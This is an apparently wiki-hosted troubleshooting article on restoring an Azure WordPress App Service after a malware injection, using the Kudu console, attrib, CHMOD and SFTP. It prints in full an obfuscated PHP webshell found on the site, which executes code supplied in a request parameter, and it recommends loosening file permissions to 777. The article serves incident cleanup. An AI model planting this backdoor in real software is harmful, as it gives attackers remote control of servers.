Share via


Azure Troubleshooting: Fix Wordpress App Service infected with malware code injection

Introduction

In this article we are going to review how to restore our web application running on Azure in case we have a possible code injection in Wordpress (PaaS)

Problem

We have an interruption in the service of our web application (PaaS) due to a malware/cross-scripting/code injection

Solution

Initially the most feasible and advisable is to have a WAF / APP Gateway and our WebApp within a Virtual Network. That said, here are some steps to be able to have one of many ways to solve the possible consequence of having the web application with this incidence.

In order to be able to solve the interruption of service first for this specific case we are going to go to the kudu console of the application for which you can access:

"Your-website-name.scm.wikiazurewebsites.net"

We will access a screen like the one shown below:

Once we access it we will go to Debug Console -> CMD:

 Now that we are in the console we are going to look for an index file in which to be able to visualize the directories of our application:

Although wordpress  web app directories are within WWWRoot, the XSS vulnerability affects all Azure web application directories including "SiteExtensions", so it is highly recommended that you review all directories in detail.

Recommendation: Check the directories first:

  • / wwwroot / site /
  •  / wp-content /
  • / wp-content / plugins /
  • / wp-includes /

The malicious code is usually detected immediately in the index.php files of the application or with the .suspected extension. Also you might see that some new folders were created randomly. For example the folder pridmag wasn´t part of the application: 

Once we go to analyze the file, we will see this malicious code:

Example of malicious code: 

$qPdntpyq4160 = "o9)d.tfj03/1vgzmubk2er(5x7w_84a*np;yl6schiq";
  
  
$lsfpcQSs2632 = "";
  
foreach([38,0,21,5] as  $j){
       $lsfpcQSs2632 .= $qPdntpyq4160[$j];
    }
  
  
if(isset($REQUEST /*pDsiayAqJlLkUzqpLBhEOdDBhpwfwWcNLloyGTzLkezyeFGjrGNRDUmTSFTqQzcDBNEHFgRafRGGIEqWrFNXMEofXOLuEVwoLinKXoCjuxhHFxuDKwfWoiJkvSVsLkjR*/["$lsfpcQSs2632"])){
    $owqHJoHl5389 = $_REQUEST /*pDsiayAqJlLkUzqpLBhEOdDBhpwfwWcNLloyGTzLkezyeFGjrGNRDUmTSFTqQzcDBNEHFgRafRGGIEqWrFNXMEofXOLuEVwoLinKXoCjuxhHFxuDKwfWoiJkvSVsLkjR*/["$lsfpcQSs2632"];
    $JYzXAdsa7417 = "";
    $kLAwcVVk3573 = "";
  
    /*SPkGyjnOAjltqokEMwPjggdrqqGOHxDNYCzXGbyFxUgvQFAGBgoWYVyEXXKnRLdlxihhiNdoPztrKPkBKIgEjDmKYyhGuSWDqHkldsbRzXagXTnqnfseOfuKsTYSrSjO*/
  
    foreach([17,30,38,20,37,29,27,3,20,39,0,3,20] as  $j){
       $JYzXAdsa7417 .= $qPdntpyq4160[$j];
    }
  
    /*CaFjsRsoDobPDQJYjvXzNBVEghiYHMPTinuaajdEbzvsDGzzzEWMfQQropMXrzPRhtDKcviOSDiOXqJUiHpUQYfXPqJQvgiJAtfoxAGRdBpdKUmjkDbUVaMxJlaCSGVu*/
  
  
    foreach([38,5,21,21,20,12] as  $j){
       $kLAwcVVk3573 .= $qPdntpyq4160[$j];
    }
  
    /*nmbMmzyOHtQmRrirHtgPuWOQXZLhIabZsYqdurJEFeKorIytwcFCmLjdFHOHSoBxSEZnWdnoWIYklSioFFxkytXkGimZvuuPLebrRImRHgFayVlcibJKdVfkaCclsvHb*/
  
    $j = $kLAwcVVk3573('n'.'o'.''.''.''.''.'i'.'t'.'c'.'n'.''.''.''.''.'u'.''.''.''.''.'f'.''.''.''.''.'_'.'e'.''.''.''.'t'.''.''.'a'.''.''.'e'.''.''.'r'.''.'c');
    $c = $j("", $JYzXAdsa7417($owqHJoHl5389));
    $c();
    exit();
  
}

In most cases these types of files are not editable.

If trying to delete / modify the file you get the following error below:

**we added a ".p" at the end of the malicious file - the original malicious file name was db.php.suspected

We will perform the following steps to be able to delete the file or restore the original:

Option 1. Delete files

In the KUDU console, we will go to the directory where the file is located

We will verify the read / write attributes of the file with the command below

 "attrib db.php.suspected.p"

** Note: Please see below a list of the parameters attributes for the files.

Parameters

  • + r: Sets the read-only file attribute.
  • -r: Clears the read-only file attribute.
  • + a: Sets the archive file attribute.
  • -a: Clears the archive file attribute.
  • + s: Sets the system file attribute.
  • -s: Clears the system file attribute.
  • + h: Sets the hidden file attribute.
  • -h: Clears the hidden file attribute

In this case we will use attrib -r db.php.suspected.p

Once we have done this step we can delete the malicious file. We are going to click back on the browser and click on the icon as shown below:

Option 2. Modify files

If the above option1 does not work, we will execute the CHMOD command to change the write permissions of this specific file:

 CHMOD 777 db.php.suspected.p

** Note could be CHMOD 644 depending on the level of appropriate permissions:

Files / Folders Permissions

  • wp-content (755)
  • wp-includes (644)
  • All .php files (644)
  • All folders (755)
  • wp-config.php (public_html folder) (444)
  • index.php (public_html folder) (444)

After that we would be able to delete the file

** Note: if it is still not possible to delete the file:

  • Stop the application
  • Change the read / write permissions by executing CHMOD 777 file.php
  • Ddelete or modify the file.

Option 3. Restore Files

Connect to the application via SFTP and replace the file. You must first change the file's write permissions.

Usually the malware starts in an index.php and is expanded by other directories so you have to inspect all the directories and delete the malicious files or restore them.
Alternative suggestions

  • Use the security plugins such as Sucuri Security or All In One WP Security & Firewall that secures, hardens and regularly scans your website.
  • Deploy your webapp within a Vnet 
  • Enable WAF  and try to automate rule updates whenever possible
  • Best Practices For WordPress Security On Azure

Other Languages

es-MX: Azure: Cómo restaurar un AppService wordpress con malware(es-MX)

Glossary

Item Description
XSS Cross-site scripting
CHMOD  Change mode
SFTP  SSH File Transfer Protocol